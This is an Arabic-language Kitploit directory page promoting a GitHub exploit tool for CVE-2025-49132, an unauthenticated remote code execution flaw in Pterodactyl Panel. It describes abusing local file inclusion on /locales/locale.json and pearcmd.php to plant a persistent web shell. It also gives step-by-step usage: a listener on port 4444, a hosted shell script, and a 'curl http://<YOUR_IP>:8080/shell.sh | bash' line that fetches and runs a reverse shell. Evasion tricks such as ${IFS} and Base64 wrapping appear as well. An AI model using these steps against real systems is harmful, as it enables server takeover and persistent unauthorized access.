Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49132-Mods — استغلال آلي لـ CVE-2025-49132، وهو تنفيذ رمز عن بُعد غير مصادق عليه وحرج في Pterodactyl Panel. يستفيد من LFI عبر نقطة نهاية locale لنشر قذائف ويب دائمة وتحقيق وصول قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/malw0re/cve-2025-49132-mods
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubmalw0re/cve-2025-49132-mods

CVE-2025-49132-Mods

استغلال آلي لـ CVE-2025-49132، وهو تنفيذ رمز عن بُعد غير مصادق عليه وحرج في Pterodactyl Panel. يستفيد من LFI عبر نقطة نهاية locale لنشر قذائف ويب دائمة وتحقيق وصول قشرة عكسية.

عرض المستودع
12249منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-49132 - RCE بسيط

Python CVE

📝 نظرة عامة

يحتوي هذا المستودع على استغلال متخصص لثغرة CVE-2025-49132، وهي ثغرة حرجة تسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) دون مصادقة في لوحة Pterodactyl (قبل الإصدار v1.11.11).

توجد الثغرة في نقطة النهاية /locales/locale.json. من خلال التلاعب بمعاملات الاستعلام locale و namespace، يمكن للمهاجم استغلال تضمين الملفات المحلي (LFI) للتفاعل مع pearcmd.php. يسمح ذلك بإنشاء ملفات عشوائية وتنفيذ الأوامر، مما يؤدي إلى اختراق كامل للنظام.

⚙️ سلسلة الاستغلال

يقوم سكربت ape.py بأتمتة الخطوات التالية:

اكتشاف PEAR: يقوم بفحص بنية الدلائل لتحديد موقع تثبيت PEAR على الهدف.

إنشاء باب خلفي: يستخدم config-create من PEAR لكتابة شيل ويب دائم إلى /tmp/shell.php.

🚀 تعليمات الاستخدام

لتحقيق اتصال عكسي ناجح على الهدف، اتبع سير العمل التالي:

  1. التحضير المستمع: قم بتشغيل Penelope (أو المستمع المفضل لديك) في طرفية منفصلة:

penelope -p 4444

خادم الاستضافة: إذا كنت تستخدم سكربت شيل مخصصًا، فاستضفه عبر Python:

python3 -m http.server 8080
  1. التنفيذ قم بتشغيل السكربت في الوضع التفاعلي للتحكم في عملية الاستغلال:

python3 ape.py --host xxx.xxx.xxx --interactive

  1. التقاط الشيل داخل موجه shell> ، استخدم الأمر التالي لتنفيذ حمولتك المعدّة:

shell> curl http://<YOUR_IP>:8080/shell.sh | bash

🛡️ الضمانات التقنية

تجاوز المسافات: يستخدم تلقائيًا ${IFS} لضمان بقاء الحمولات سليمة أثناء تحليل عنوان URL.

غلاف Base64: يغلّف أوامر الشيل العكسي في Base64 لمنع تشوه الأحرف بواسطة خادم Nginx/الويب الخاص بالهدف.

معالجة المهلة: مصمم لاكتشاف متى يتم الاتصال بالشيل العكسي بنجاح حتى لو علق طلب الويب.

تنزيل الأداة